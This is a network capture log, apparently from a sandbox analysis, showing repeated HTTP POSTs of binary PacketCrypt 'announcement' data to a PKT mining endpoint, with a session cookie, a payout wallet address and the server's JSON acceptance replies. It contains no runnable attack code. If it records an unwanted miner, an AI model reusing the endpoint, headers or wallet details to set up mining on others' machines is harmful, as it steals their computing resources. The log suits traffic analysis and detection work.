Jan 7, 2025 14:00:19.772185087 CET	4944	OUT	Data Raw: 8c 0b a8 ff 04 4f 82 d7 b8 b1 94 95 05 26 e2 c4 0d 52 92 d3 97 9b c8 34 6b 59 f8 37 49 c1 ad b9 e9 2e e7 88 e6 9b 93 4e a5 0c 89 9e 78 12 42 eb 51 8e 7e a2 cd 94 f6 ae d2 d2 86 d4 f2 21 b2 64 cf de b8 39 5d 64 28 de 95 19 61 76 e3 25 24 b9 4b d8 Data Ascii: O&R4kY7I.NxBQ~!d9]d(av%$K_&}qX`bt_H Hd7,!>crTr[:)6%%nvAWh2lmDM.W%Ai68QDvK:<Xp_+r>UrgOE400t[
Jan 7, 2025 14:00:21.164979935 CET	460	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Jan 2025 13:00:21 GMT Content-Type: application/json Content-Length: 296 Connection: keep-alive Data Raw: 7b 22 77 61 72 6e 22 3a 5b 5d 2c 22 65 72 72 6f 72 22 3a 5b 5d 2c 22 72 65 73 75 6c 74 22 3a 7b 22 74 79 70 65 22 3a 22 61 6e 6e 73 22 2c 22 61 63 63 65 70 74 65 64 22 3a 34 36 37 2c 22 64 75 70 22 3a 30 2c 22 69 6e 76 61 6c 22 3a 30 2c 22 62 61 64 48 61 73 68 22 3a 30 2c 22 72 75 6e 74 22 3a 30 2c 22 69 6e 74 65 72 6e 61 6c 45 72 72 22 3a 30 2c 22 70 61 79 54 6f 22 3a 22 70 6b 74 31 71 78 79 73 63 35 38 67 34 63 77 77 61 75 74 67 36 64 72 34 70 37 71 37 73 64 36 74 6e 32 6c 64 67 75 6b 74 68 35 61 22 2c 22 75 6e 73 69 67 6e 65 64 22 3a 34 36 37 2c 22 74 6f 74 61 6c 4c 65 6e 22 3a 30 2c 22 74 61 72 67 65 74 22 3a 35 32 31 36 31 38 33 35 36 2c 22 74 69 6d 65 22 3a 31 37 33 36 32 35 34 38 32 31 30 36 32 2c 22 65 76 65 6e 74 49 64 22 3a 22 63 61 68 2d 32 38 33 37 30 39 38 2d 43 32 45 45 46 38 34 31 35 32 36 32 35 30 42 37 38 32 41 30 31 33 39 39 39 45 34 39 46 35 34 37 22 7d 7d Data Ascii: {"warn":[],"error":[],"result":{"type":"anns","accepted":467,"dup":0,"inval":0,"badHash":0,"runt":0,"internalErr":0,"payTo":"pkt1qxysc58g4cwwautg6dr4p7q7sd6tn2ldgukth5a","unsigned":467,"totalLen":0,"target":521618356,"time":1736254821062,"eventId":"cah-2837098-C2EEF841526250B782A013999E49F547"}}

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 14:00:30.000997066 CET	277	OUT	POST /anns/submit?cookie=4a3701444348c2607de40463d7dc7d0a8e9940959292aab39a317c42591d2da0 HTTP/1.1 x-pc-payto: pkt1qxysc58g4cwwautg6dr4p7q7sd6tn2ldgukth5a x-pc-sver: 1 x-pc-annver: 1 x-pc-worknum: 2837099 accept: / host: any.ah.pkt.world transfer-encoding: chunked
Jan 7, 2025 14:00:30.000998020 CET	11124	OUT	Data Raw: 34 30 30 0d 0a 01 98 ec 04 4f 7c 8c e1 b4 43 17 1f 6a 4a 2b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: 400O\|CjJ+{rt\\2HaT\|~&]TUx hqH<#%7 u(f20O\|'vM9p:;(#0tW7dxp
Jan 7, 2025 14:00:30.006129026 CET	8652	OUT	Data Raw: d6 09 97 a0 55 9e 5a 67 41 d8 7c d9 75 92 82 8b fd e1 1e 6f f8 a1 75 c8 23 0d ba 72 88 d7 0a 12 3a fd f4 3c 72 93 e6 25 c7 76 a2 de 27 aa 45 e0 80 16 38 b3 34 fa 47 6f 7f 0d 87 e8 65 d0 79 68 1e f9 3f 41 98 e5 f8 02 2e 01 03 89 a1 97 6e 43 92 a1 Data Ascii: UZgA\|uou#r:<r%v'E84Goeyh?A.nCotX=lopT&.?v5``5?TM.zxv`'w~&INF#DJ8JwJY:]9j2~-24005M\|CjJ+
Jan 7, 2025 14:00:30.006176949 CET	7416	OUT	Data Raw: 56 8b 68 2e b7 d3 a1 18 ef 42 60 20 7c 48 98 ea 5b b7 2a 41 a0 7a 94 2e 07 d9 16 df d7 c8 f9 1e e3 ec ae 01 7a 3f 33 93 c3 a0 e8 75 04 ee 37 cc 9a 00 e5 69 c4 d3 9f 79 4a f9 ed 04 50 32 64 ed fb 95 62 50 74 4d 89 cd b3 da 37 6c 6b 7c f0 0c 5f 62 Data Ascii: Vh.B` \|H[*Az.z?3u7iyJP2dbPtM7lk\|_buPurcub ^\|w_0Mt'u=%8EM,4\Zl7Lp)ueO5zxfoC}~DkOo]oFMLr\?qf}s!,"cEG
Jan 7, 2025 14:00:30.006217003 CET	2472	OUT	Data Raw: 60 74 a9 52 6c 23 48 f1 e0 03 86 7d 9d 86 b9 d8 22 23 67 34 6b 2e d9 01 98 9d 4b 8d 4e 7a b5 79 b5 ce 90 9c a1 f3 bf 38 e9 7f 99 2e ff 98 f2 87 38 9d 6a fc 37 5c f8 b4 e4 6e 41 bf 43 01 29 7a b2 20 55 05 ce 97 34 3f 68 8d fa 1e 9a 8e 20 1c f9 84 Data Ascii: `tRl#H}"#g4k.KNzy8.8j7\nAC)z U4?h nJ]6@j9WAw.Ih"yu4pMA\|+{6m"cq#'J+[.IQ#iR8;5?LdwI${0O_]qB
Jan 7, 2025 14:00:30.006418943 CET	4944	OUT	Data Raw: 94 0a 9a c5 3a fd 12 cd d8 8c cd 8d 71 78 f3 08 d2 3c e0 6b 0d 09 72 83 d4 68 41 86 0b 91 68 e9 51 d1 8a cc c1 d0 cb 2a 5e 1e 31 67 65 6b 17 06 ab a7 85 55 83 77 bb 62 a1 3e a8 77 a9 3a d6 0e b3 12 98 65 a2 42 37 ad d0 aa ee 93 c8 1c f5 6f 3f 19 Data Ascii: :qx<krhAhQ*^1gekUwb>w:eB7o?Y07q$SM>'>GJ_FT/Y,8E7114rXwuo&KA`w'/\|Nc8r:M2$WB(W{n^ujQ400i
Jan 7, 2025 14:00:30.011861086 CET	7416	OUT	Data Raw: aa 2a 59 b6 ff 56 c6 0c 7d e1 f2 59 dc 73 95 7d d4 33 64 0b 47 4c a1 49 4b a7 a0 91 80 b4 03 4d e9 3b cf ef 30 b3 e5 d5 68 de e6 dc ab 26 8e 1c 56 bb 72 b8 04 5d 39 7e e3 0f f9 04 01 c9 8e f7 26 b2 ed e3 2e 4e 66 f3 ac fb c8 b8 7a eb 5e 5b a9 af Data Ascii: YV}Ys}3dGLIKM;0h&Vr]9~&.Nfz^[:d$lT-[Z\nO<&I.m(F>=t5e~APq%G78O~i;KTdr&HZQ3?_C/A;E}B,}bxK)Ww$
Jan 7, 2025 14:00:30.011914015 CET	7416	OUT	Data Raw: bc 53 06 46 2b 72 cb 95 9e 8b d2 73 45 bf 5d 93 36 f5 1f 2b a5 8b 07 80 0a fc 02 65 b7 a7 e0 54 8a d3 39 33 af bb 78 2b 6e 6d e3 0c ea cb 35 0b 98 85 f4 52 cf 72 07 62 e2 be 68 9d a4 33 de 6b 9f b7 b5 fa 3a dd 00 b3 4c ef 1e 72 23 a4 ef fa d7 c9 Data Ascii: SF+rsE]6+eT93x+nm5Rrbh3k:Lr#sPmi:<Ybk*ZNMLEba,iXSV^{QY,8E7114rXwuo&KA`w'/\|Nc8r:M2",R??,J^CD\&f
Jan 7, 2025 14:00:30.053241014 CET	35844	OUT	Data Raw: 0c 4e 8b bf 07 46 c9 d5 c0 ce 6e 71 b9 45 d2 e6 05 08 78 77 c0 e8 51 8b a3 36 2e 40 c3 91 ea 79 fd 8f d6 18 a0 95 e9 2b 79 51 44 c0 de 05 0d 0a 34 30 30 0d 0a 01 b0 5c 05 4f 7c 8c e1 b4 43 17 1f 6a 4a 2b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: NFnqExwQ6.@y+yQD400\O\|CjJ+@VVRl^B+\{8uXJbR8z:fqo0H$Opr9hC(QRQm\#wVx;mRDSg
Jan 7, 2025 14:00:30.105148077 CET	1236	OUT	Data Raw: dc e0 b4 9e 3c 7e 15 a5 7a 5b bb b2 35 5f d7 98 12 5d 2c 0c 3a e8 44 7f e9 0d a9 bb b1 d9 58 25 46 c4 fc 42 2a 94 5d 0d 35 db 7c fb 3e 39 8c 0b 8f 63 e9 e3 31 44 41 a8 71 4a 33 43 f2 27 20 52 60 07 d9 2a ae 8b 02 d6 92 56 df 09 4f 4a c8 9a 08 8d Data Ascii: <~z[5_],:DX%FB]5\|>9c1DAqJ3C' R`VOJ;Xa>$>27#J0zHW+4do4Iqo/9p/^L PO3ir@Hhu=xe#MF75ddy}pr,?s8KMeNX7fT>Lv^
Jan 7, 2025 14:00:30.119071007 CET	43386	OUT	Data Raw: b7 1e 6e e6 0b 76 41 57 17 b4 68 32 6c 6d 44 a9 4d 2e 57 b5 25 9a e7 41 89 06 d6 08 69 f9 be 36 38 fa af e9 84 ee 96 8c 11 c8 fa 6e 6f 12 e2 c1 08 08 6d 54 6c 82 6b 6c 9c f1 99 b3 e8 14 d3 93 a1 80 bc 1c 11 cc cc 0f 66 04 4d 96 27 5d cb a7 10 25 Data Ascii: nvAWh2lmDM.W%Ai68nomTlklfM']%400+M\|CjJ+K7G25LK7&^~YpG.vdo=DQU?!r$D9[cO
Jan 7, 2025 14:00:35.734587908 CET	460	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Jan 2025 13:00:35 GMT Content-Type: application/json Content-Length: 296 Connection: keep-alive Data Raw: 7b 22 77 61 72 6e 22 3a 5b 5d 2c 22 65 72 72 6f 72 22 3a 5b 5d 2c 22 72 65 73 75 6c 74 22 3a 7b 22 74 79 70 65 22 3a 22 61 6e 6e 73 22 2c 22 61 63 63 65 70 74 65 64 22 3a 35 34 39 2c 22 64 75 70 22 3a 30 2c 22 69 6e 76 61 6c 22 3a 30 2c 22 62 61 64 48 61 73 68 22 3a 30 2c 22 72 75 6e 74 22 3a 30 2c 22 69 6e 74 65 72 6e 61 6c 45 72 72 22 3a 30 2c 22 70 61 79 54 6f 22 3a 22 70 6b 74 31 71 78 79 73 63 35 38 67 34 63 77 77 61 75 74 67 36 64 72 34 70 37 71 37 73 64 36 74 6e 32 6c 64 67 75 6b 74 68 35 61 22 2c 22 75 6e 73 69 67 6e 65 64 22 3a 35 34 39 2c 22 74 6f 74 61 6c 4c 65 6e 22 3a 30 2c 22 74 61 72 67 65 74 22 3a 35 32 31 36 31 38 33 35 36 2c 22 74 69 6d 65 22 3a 31 37 33 36 32 35 34 38 33 35 36 32 33 2c 22 65 76 65 6e 74 49 64 22 3a 22 63 61 68 2d 32 38 33 37 30 39 38 2d 31 37 46 43 41 46 39 39 31 33 31 32 44 36 37 37 33 34 35 31 44 41 44 37 44 32 41 32 42 32 39 42 22 7d 7d Data Ascii: {"warn":[],"error":[],"result":{"type":"anns","accepted":549,"dup":0,"inval":0,"badHash":0,"runt":0,"internalErr":0,"payTo":"pkt1qxysc58g4cwwautg6dr4p7q7sd6tn2ldgukth5a","unsigned":549,"totalLen":0,"target":521618356,"time":1736254835623,"eventId":"cah-2837098-17FCAF991312D6773451DAD7D2A2B29B"}}
Jan 7, 2025 14:00:35.953097105 CET	460	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Jan 2025 13:00:35 GMT Content-Type: application/json Content-Length: 296 Connection: keep-alive Data Raw: 7b 22 77 61 72 6e 22 3a 5b 5d 2c 22 65 72 72 6f 72 22 3a 5b 5d 2c 22 72 65 73 75 6c 74 22 3a 7b 22 74 79 70 65 22 3a 22 61 6e 6e 73 22 2c 22 61 63 63 65 70 74 65 64 22 3a 35 34 39 2c 22 64 75 70 22 3a 30 2c 22 69 6e 76 61 6c 22 3a 30 2c 22 62 61 64 48 61 73 68 22 3a 30 2c 22 72 75 6e 74 22 3a 30 2c 22 69 6e 74 65 72 6e 61 6c 45 72 72 22 3a 30 2c 22 70 61 79 54 6f 22 3a 22 70 6b 74 31 71 78 79 73 63 35 38 67 34 63 77 77 61 75 74 67 36 64 72 34 70 37 71 37 73 64 36 74 6e 32 6c 64 67 75 6b 74 68 35 61 22 2c 22 75 6e 73 69 67 6e 65 64 22 3a 35 34 39 2c 22 74 6f 74 61 6c 4c 65 6e 22 3a 30 2c 22 74 61 72 67 65 74 22 3a 35 32 31 36 31 38 33 35 36 2c 22 74 69 6d 65 22 3a 31 37 33 36 32 35 34 38 33 35 36 32 33 2c 22 65 76 65 6e 74 49 64 22 3a 22 63 61 68 2d 32 38 33 37 30 39 38 2d 31 37 46 43 41 46 39 39 31 33 31 32 44 36 37 37 33 34 35 31 44 41 44 37 44 32 41 32 42 32 39 42 22 7d 7d Data Ascii: {"warn":[],"error":[],"result":{"type":"anns","accepted":549,"dup":0,"inval":0,"badHash":0,"runt":0,"internalErr":0,"payTo":"pkt1qxysc58g4cwwautg6dr4p7q7sd6tn2ldgukth5a","unsigned":549,"totalLen":0,"target":521618356,"time":1736254835623,"eventId":"cah-2837098-17FCAF991312D6773451DAD7D2A2B29B"}}

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 14:00:40.344712019 CET	277	OUT	POST /anns/submit?cookie=4a3701444348c2607de40463d7dc7d0a8e9940959292aab39a317c42591d2da0 HTTP/1.1 x-pc-payto: pkt1qxysc58g4cwwautg6dr4p7q7sd6tn2ldgukth5a x-pc-sver: 1 x-pc-annver: 1 x-pc-worknum: 2837099 accept: / host: any.ah.pkt.world transfer-encoding: chunked
Jan 7, 2025 14:00:40.344835997 CET	11124	OUT	Data Raw: 34 30 30 0d 0a 01 ad 99 09 4e 7c 8c e1 b4 43 17 1f 6a 4a 2b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: 400N\|CjJ+@$41jlwx) b0>il'+Bwu]ID/qZAG9^10QKP6qKM!Fzcp}1SHZ9N<O5hgE)J
Jan 7, 2025 14:00:40.349685907 CET	1236	OUT	Data Raw: 62 64 5e c6 ce 0c e5 58 01 a5 fc fc c4 28 4c c3 58 95 89 57 83 25 18 59 5f 80 6c 22 db 9b 79 22 96 e5 5a 62 02 2b e0 48 08 a4 e0 3e 33 a9 e0 3e a0 05 18 b9 5b ec d1 88 61 28 84 ba 49 eb 09 c3 ca 8c 8f 47 c6 21 ec c5 72 e5 c4 ec e7 f1 4e f6 b4 b0 Data Ascii: bd^X(LXW%Y_l"y"Zb+H>3>[a(IG!rNQM?:{E8ui@opT&.?v5``5?TM.zxv`'w~&INFgxS![5ph;ZL400}M\|CjJ+
Jan 7, 2025 14:00:40.349728107 CET	4944	OUT	Data Raw: 2d b7 61 c7 1b 4a 60 8d b4 fd 0d 0a 34 30 30 0d 0a 01 78 2d 0c 4c 7c 8c e1 b4 43 17 1f 6a 4a 2b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: -aJ`400x-L\|CjJ+D;3P~U&gV62dhTzM</\|6vAb8 &/`Gq5k\|Gix=M]JZU,mds6I(*
Jan 7, 2025 14:00:40.349760056 CET	2472	OUT	Data Raw: 64 7d db 24 fb a4 b9 5b 63 ba 4f 0f 77 04 22 52 ed b7 e4 de ca 29 1d ff 9c 01 67 91 e5 c5 6a 5b 45 c2 36 b8 d8 ba 4a c9 0a 00 68 59 60 1b 0b c0 a4 40 5c e2 7d 0c 38 f3 e6 2a c4 bc b1 e4 88 1e ed b4 14 fb ba 19 cc 63 a2 5d 54 d2 a7 8b 95 35 c7 2e Data Ascii: d}$[cOw"R)gj[E6JhY`@\}8*c]T5.9g@ [[miyRRT7!',ddy}pr,?s8KMeNX7fT>Lv^lVL$9'~6Qu;2a_d seHB\400N\|CjJ+
Jan 7, 2025 14:00:40.349910021 CET	2472	OUT	Data Raw: eb ae e8 fd 1d 99 2f b2 b1 e4 cb 78 e0 2b 38 68 77 f5 c9 ec 72 50 e6 13 6e e6 99 6c eb dd 19 17 9a 44 fb 37 cf a5 e5 4d b8 75 3f b4 d5 e1 b5 e2 57 42 be af 9b 38 39 6a 45 41 f4 8e 4c b8 6d e4 2f 96 09 cd a4 90 ba 16 42 4b 8a 7d 32 54 e6 f0 d4 88 Data Ascii: /x+8hwrPnlD7Mu?WB89jEALm/BK}2ToZ1Y~bhqX]o]_\C"S-eUkn+=1}0T[]7>RWp$P8Hv,Z+a{2lT)wle0ALqK/=b
Jan 7, 2025 14:00:40.349930048 CET	2472	OUT	Data Raw: 80 7a 21 fa 92 91 8a 33 0f 08 39 7f 33 e2 48 b4 87 8d 12 97 d2 aa 0b e6 25 e9 b8 93 5b 32 e4 ba 7e 40 da a4 a6 4b e5 dd 39 c8 04 f4 24 0b 92 b7 3d d7 1e ab d7 68 a0 ce 2f 0e b5 b6 7b 7f 4b f6 b6 f0 14 04 a3 cb 96 d1 ec cd f5 6f 8a 44 47 34 ef a5 Data Ascii: z!393H%[2~@K9$=h/{KoDG40yJF2Ks;Sg=\UmVx([[#V9NMl5+RaBp^>^u&}_[~BJet@]!}I^Tx0*w5#XyB
Jan 7, 2025 14:00:40.350018978 CET	2472	OUT	Data Raw: d1 f1 af 46 16 bb b9 a9 82 5d d1 35 04 19 b0 94 76 3c 45 36 76 69 0d 0a 34 30 30 0d 0a 01 6c 72 0c 4c 7c 8c e1 b4 43 17 1f 6a 4a 2b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: F]5v<E6vi400lrL\|CjJ+E ;+-&@RC7*+kEat\!b&,Y RQV[""77lxG
Jan 7, 2025 14:00:40.350037098 CET	2472	OUT	Data Raw: 3f 50 b3 45 66 70 59 8b c8 6c a4 89 7e 3b 4f 33 38 c8 b0 01 f7 85 2d 2b a9 ac 4d f4 ac b4 d6 1e ea dd 3f 48 28 d2 d2 21 9f 3d 7a 33 b9 71 59 eb 69 4d 60 04 ef d2 17 86 48 af 8f 0d 02 42 ac 19 00 4d 27 a9 31 40 7d 7f 38 0a bf 9e 67 77 da 5c 9f 17 Data Ascii: ?PEfpYl~;O38-+M?H(!=z3qYiM`HBM'1@}8gw\PgD7o&Z+@6W[OYaW71&ncrN$s<4'`2(;5}%spjsIty1wW/RraYh8dyfc.X@3vGu&
Jan 7, 2025 14:00:40.350106955 CET	2472	OUT	Data Raw: dd 90 34 8d ec 6e 82 8e f5 e5 f5 67 3d 1e 13 c1 9e 30 e5 11 1f 76 f6 5f d5 a9 f7 ff f7 1a 04 83 38 e3 bd 55 5d 48 69 a3 28 14 04 f3 fb 3c 8b 63 5c 3c 59 de f6 9a 21 ad 1d b3 59 ba b1 56 6d fa 94 aa aa 4a 1d 5b 83 eb 32 ee 1e cb d5 2d 70 63 eb c1 Data Ascii: 4ng=0v_8U]Hi(<c\<Y!YVmJ[2-pc$qeW-{RaA;4H@"[`(+-crTr[:)6%%nvAWh2lmDM.W%Ai68#/G.r}3cTJg7*wM400\
Jan 7, 2025 14:00:40.350121021 CET	2472	OUT	Data Raw: 15 d2 0b fd 32 69 ec 4a 4b 7d 80 ca 45 4e a7 c1 5a c2 cd bb 86 0c 21 9c 9c 6c 3b c9 28 d4 6d ca 1e ae 36 2c 6d ed 9e 16 ff 3a 9a df 7d 35 51 e9 86 32 ce 1d d2 3b 10 b9 cd 7b ee 2c da 1e ee 58 9a 7e bb d7 af 83 de 30 8b 16 d6 92 17 f2 67 a5 09 71 Data Ascii: 2iJK}ENZ!l;(m6,m:}5Q2;{,X~0gqBVEx&H2O&\|U"h9:{}i0=jYZKz`<;ihhq&$Dza7Zs>EA0z`$3]jiLV+2U
Jan 7, 2025 14:00:41.550515890 CET	460	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Jan 2025 13:00:41 GMT Content-Type: application/json Content-Length: 296 Connection: keep-alive Data Raw: 7b 22 77 61 72 6e 22 3a 5b 5d 2c 22 65 72 72 6f 72 22 3a 5b 5d 2c 22 72 65 73 75 6c 74 22 3a 7b 22 74 79 70 65 22 3a 22 61 6e 6e 73 22 2c 22 61 63 63 65 70 74 65 64 22 3a 34 32 32 2c 22 64 75 70 22 3a 30 2c 22 69 6e 76 61 6c 22 3a 30 2c 22 62 61 64 48 61 73 68 22 3a 30 2c 22 72 75 6e 74 22 3a 30 2c 22 69 6e 74 65 72 6e 61 6c 45 72 72 22 3a 30 2c 22 70 61 79 54 6f 22 3a 22 70 6b 74 31 71 78 79 73 63 35 38 67 34 63 77 77 61 75 74 67 36 64 72 34 70 37 71 37 73 64 36 74 6e 32 6c 64 67 75 6b 74 68 35 61 22 2c 22 75 6e 73 69 67 6e 65 64 22 3a 34 32 32 2c 22 74 6f 74 61 6c 4c 65 6e 22 3a 30 2c 22 74 61 72 67 65 74 22 3a 35 32 31 36 31 38 33 35 36 2c 22 74 69 6d 65 22 3a 31 37 33 36 32 35 34 38 34 31 34 35 34 2c 22 65 76 65 6e 74 49 64 22 3a 22 63 61 68 2d 32 38 33 37 30 39 38 2d 45 43 39 38 39 30 33 35 31 34 39 34 44 43 34 32 45 32 37 39 46 30 43 34 46 39 44 42 44 38 44 36 22 7d 7d Data Ascii: {"warn":[],"error":[],"result":{"type":"anns","accepted":422,"dup":0,"inval":0,"badHash":0,"runt":0,"internalErr":0,"payTo":"pkt1qxysc58g4cwwautg6dr4p7q7sd6tn2ldgukth5a","unsigned":422,"totalLen":0,"target":521618356,"time":1736254841454,"eventId":"cah-2837098-EC9890351494DC42E279F0C4F9DBD8D6"}}
Jan 7, 2025 14:00:41.765074015 CET	460	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Jan 2025 13:00:41 GMT Content-Type: application/json Content-Length: 296 Connection: keep-alive Data Raw: 7b 22 77 61 72 6e 22 3a 5b 5d 2c 22 65 72 72 6f 72 22 3a 5b 5d 2c 22 72 65 73 75 6c 74 22 3a 7b 22 74 79 70 65 22 3a 22 61 6e 6e 73 22 2c 22 61 63 63 65 70 74 65 64 22 3a 34 32 32 2c 22 64 75 70 22 3a 30 2c 22 69 6e 76 61 6c 22 3a 30 2c 22 62 61 64 48 61 73 68 22 3a 30 2c 22 72 75 6e 74 22 3a 30 2c 22 69 6e 74 65 72 6e 61 6c 45 72 72 22 3a 30 2c 22 70 61 79 54 6f 22 3a 22 70 6b 74 31 71 78 79 73 63 35 38 67 34 63 77 77 61 75 74 67 36 64 72 34 70 37 71 37 73 64 36 74 6e 32 6c 64 67 75 6b 74 68 35 61 22 2c 22 75 6e 73 69 67 6e 65 64 22 3a 34 32 32 2c 22 74 6f 74 61 6c 4c 65 6e 22 3a 30 2c 22 74 61 72 67 65 74 22 3a 35 32 31 36 31 38 33 35 36 2c 22 74 69 6d 65 22 3a 31 37 33 36 32 35 34 38 34 31 34 35 34 2c 22 65 76 65 6e 74 49 64 22 3a 22 63 61 68 2d 32 38 33 37 30 39 38 2d 45 43 39 38 39 30 33 35 31 34 39 34 44 43 34 32 45 32 37 39 46 30 43 34 46 39 44 42 44 38 44 36 22 7d 7d Data Ascii: {"warn":[],"error":[],"result":{"type":"anns","accepted":422,"dup":0,"inval":0,"badHash":0,"runt":0,"internalErr":0,"payTo":"pkt1qxysc58g4cwwautg6dr4p7q7sd6tn2ldgukth5a","unsigned":422,"totalLen":0,"target":521618356,"time":1736254841454,"eventId":"cah-2837098-EC9890351494DC42E279F0C4F9DBD8D6"}}
Jan 7, 2025 14:00:59.735723972 CET	64272	OUT	POST /anns/submit?cookie=4a3701444348c2607de40463d7dc7d0a8e9940959292aab39a317c42591d2da0 HTTP/1.1 x-pc-payto: pkt1qxysc58g4cwwautg6dr4p7q7sd6tn2ldgukth5a x-pc-sver: 1 x-pc-annver: 1 x-pc-worknum: 2837099 accept: / host: any.ah.pkt.world transfer-encoding: chunked Data Raw: 34 30 30 0d 0a 01 49 5c 06 51 7c 8c e1 b4 43 17 1f 6a 4a 2b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 eb cc 7e 46 b9 95 c9 90 7a 98 88 ea b3 1d 7b f0 32 5b 7b 16 2b d3 b5 39 f9 a9 16 06 34 de db 29 e2 ee 2b 93 a8 a2 03 e6 60 04 0c 38 bc c7 3d 81 26 c3 7e 8e f8 59 0e 4e 22 58 4f 8f b4 43 ec b2 ea f6 0a 5b cd 6e 12 65 f1 ba 82 24 e8 7c eb d8 eb 94 0f 4d 1b 28 23 13 33 b3 b5 78 70 87 3c 44 ff 0a 82 9e 34 f0 c3 95 8c be 7f 3e bf 3a 78 4f 9c a4 ba d5 cd ba 44 78 7e 10 13 bf cd fe 3c 6c 7d 84 2f 6b e8 44 50 d6 1d 53 cd 92 ac 7e f1 a1 a5 e8 de ed 19 2a d2 5c 80 93 f6 8e 2b b1 89 66 08 b3 07 c6 ca f5 ff 01 81 3a cb 6b a4 e8 83 6e 57 49 a1 08 18 44 b3 25 a0 fd 8b d5 1a cf d8 83 67 80 cb f3 82 e8 2a f4 46 af ac d2 a0 8f 99 1c 32 92 64 8d e4 f1 6e a2 c8 46 1b bb b8 1b b4 1d e6 73 dc fa 6d 98 3a 39 af d1 13 ec e9 cf 1a df b4 8f 6c e4 7e [TRUNCATED] Data Ascii: 400I\Q\|CjJ+~Fz{2[{+94)+`8=&~YN"XOC[ne$\|M(#3xp<D4>:xODx~<l}/kDPS~\+f:knWID%gF2dnFsm:9l~SZh5bSWX!y!S{ah7=T lb0@5WCL;!QWk-/p;=F4t5g]JOp_6IV<?-#&WM<s6Gj&gcm54P~q`Ch\@v^gnsgWv(7T2^k~sILu:\iYJoZ#Ym?ne;Nk!gqK-<e}@z{BDpM+~`or/wXjZ\~X=q;+RZj$;WQw6ck$flxE6}<i+)[`?N \chJ%lA;Fp.v9D$%sdo Wh;:&"R_ _;LYKs-ei?9%[k-xYb]\|jFs F t8'~<y0k> [TRUNCATED]
Jan 7, 2025 14:01:01.845244884 CET	460	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Jan 2025 13:01:01 GMT Content-Type: application/json Content-Length: 296 Connection: keep-alive Data Raw: 7b 22 77 61 72 6e 22 3a 5b 5d 2c 22 65 72 72 6f 72 22 3a 5b 5d 2c 22 72 65 73 75 6c 74 22 3a 7b 22 74 79 70 65 22 3a 22 61 6e 6e 73 22 2c 22 61 63 63 65 70 74 65 64 22 3a 34 38 38 2c 22 64 75 70 22 3a 30 2c 22 69 6e 76 61 6c 22 3a 30 2c 22 62 61 64 48 61 73 68 22 3a 30 2c 22 72 75 6e 74 22 3a 30 2c 22 69 6e 74 65 72 6e 61 6c 45 72 72 22 3a 30 2c 22 70 61 79 54 6f 22 3a 22 70 6b 74 31 71 78 79 73 63 35 38 67 34 63 77 77 61 75 74 67 36 64 72 34 70 37 71 37 73 64 36 74 6e 32 6c 64 67 75 6b 74 68 35 61 22 2c 22 75 6e 73 69 67 6e 65 64 22 3a 34 38 38 2c 22 74 6f 74 61 6c 4c 65 6e 22 3a 30 2c 22 74 61 72 67 65 74 22 3a 35 32 31 36 31 38 33 35 36 2c 22 74 69 6d 65 22 3a 31 37 33 36 32 35 34 38 36 31 37 34 36 2c 22 65 76 65 6e 74 49 64 22 3a 22 63 61 68 2d 32 38 33 37 30 39 38 2d 35 39 45 30 33 44 36 36 36 39 31 44 41 32 35 45 33 45 37 41 44 42 32 39 38 34 31 33 44 38 39 30 22 7d 7d Data Ascii: {"warn":[],"error":[],"result":{"type":"anns","accepted":488,"dup":0,"inval":0,"badHash":0,"runt":0,"internalErr":0,"payTo":"pkt1qxysc58g4cwwautg6dr4p7q7sd6tn2ldgukth5a","unsigned":488,"totalLen":0,"target":521618356,"time":1736254861746,"eventId":"cah-2837098-59E03D66691DA25E3E7ADB298413D890"}}

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 14:00:49.751075983 CET	277	OUT	POST /anns/submit?cookie=4a3701444348c2607de40463d7dc7d0a8e9940959292aab39a317c42591d2da0 HTTP/1.1 x-pc-payto: pkt1qxysc58g4cwwautg6dr4p7q7sd6tn2ldgukth5a x-pc-sver: 1 x-pc-annver: 1 x-pc-worknum: 2837099 accept: / host: any.ah.pkt.world transfer-encoding: chunked
Jan 7, 2025 14:00:49.751185894 CET	11124	OUT	Data Raw: 34 30 30 0d 0a 01 24 5a 00 51 7c 8c e1 b4 43 17 1f 6a 4a 2b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: 400$ZQ\|CjJ+R^S:VM9"^^C \N2JoAGka#,s!-TP(kO/WP=jB:q9x4c'RW:Ne`n#Z
